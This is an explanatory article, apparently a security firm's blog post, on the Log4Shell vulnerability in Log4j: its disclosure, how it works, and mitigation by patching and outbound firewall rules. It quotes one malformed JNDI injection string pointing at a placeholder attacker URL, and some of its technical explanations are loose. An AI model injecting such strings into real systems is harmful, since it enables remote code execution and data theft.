Did you know days after industry experts discovered a critical vulnerability known as Log4Shell in servers supporting the game Minecraft, attackers made millions of exploit attempts of the Log4j?
According to one team tracking the impact, the vulnerability is a potential threat to millions more applications and devices across the globe.
The internet vulnerability Log4Shell, which affects millions of machines, is caused by Log4j, an obscure but practically common piece of software. The software is used to track a variety of operations that occur behind the scenes in a variety of computer systems.
So, what exactly is this benign piece of internet infrastructure, how can hackers take advantage of it, and what kind of havoc may it cause?
In this article, we’ll answer some FAQs about the Log4Shell vulnerability.
What exactly is Log4j?
Log4j is a piece of software that allows programmes to retain track of their previous actions. Developers frequently leverage existing programmes like log4j instead of reinventing a logging or record-keeping component each time they create new software. It is available for free on the Internet and is extensively utilised, with a substantial chunk of Internet services using it.
Log4j keeps track of events, such as errors and ordinary system processes, and sends out diagnostic warnings to system administrators and users. The Apache Software Foundation provides open-source software.
When you enter in or click on a poor weblink and get a 404 error message, that’s an example of Log4j at work. There is no such webpage, according to the web server that hosts the domain of the web link you attempted to access. It also uses Log4j to log the occurrence for the server’s system administrators.
When did the original vulnerability in the Log4j library become known to experts?
The vulnerability was first disclosed to the Apache Foundation (an open-source organisation) by security researcher Chen Zhaojun of Alibaba, China’s largest e-commerce giant. They identified the attack on servers hosting the game Minecraft. Following a more forensic investigation, they revealed that fraudsters had discovered the hole earlier and had been using it for a while.
NIST issued a serious CVE in the National Vulnerability Database, called CVE-2021–44228. The Apache Software Foundation assigned a CVSS severity rating of 10 to this vulnerability.
The flaw allows for remote code execution without authentication. Attackers can exploit it by simply inserting a line of code such as $jndi:ldap:/[attacker URL]. This flaw has been discovered in the products of some of the most well-known technological companies, including AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMWare.
How does it work?
Log4Shell works by exploiting a Log4j feature that allows users to specify custom code for log message formatting. If a separate server keeps a directory linking usernames and real names, this feature allows Log4j to log not just the username associated with each attempt to log in to the server, but also the person’s real name. The Log4j server must communicate with the server that stores the real names in order to accomplish this.
This type of code, however, can be used for more than merely formatting log messages… Third-party servers can upload software code to Log4j that can conduct a variety of tasks on the targeted PC. This allows for criminal operations such as stealing sensitive data, seizing control of the targeted system, and spreading malicious content to other users talking with the affected server.
Log4j is all over the place
The position of Log4Shell in the software ecosystem is one of the primary problems. Because logging is a standard part of most applications, Log4j is widely used. It is used in a wide range of programmes from software development tools to security products. It’s also used in cloud services like Apple iCloud and AWS, as well as a wide range of applications from software development tools to security tools.
As a result, hackers have a wide range of targets to choose from, including ordinary people, service providers, source code developers, and even security experts. While large corporations like Amazon can swiftly fix their web services to prevent hackers from exploiting them, many more enterprises will take longer to do so, and others may not even realise they need to.
How do we mitigate the risks?
- The vendor has provided a patch, and customers are urged to update their Log4j to version 2.17.0 if possible.
- Firewall – Using outbound firewall rules on servers to prevent attackers is an effective mitigation method. If the server can perform DNS lookups, and attackers hunt for susceptible log4j2 instances, the DNS lookup will be triggered. Although attackers may readily get around firewalls, having one can help protect you by blocking the outgoing connections of a real attack.
Need help or advice on how to prevent hackers? We can help! Click here to book a meeting with one of our expert team members.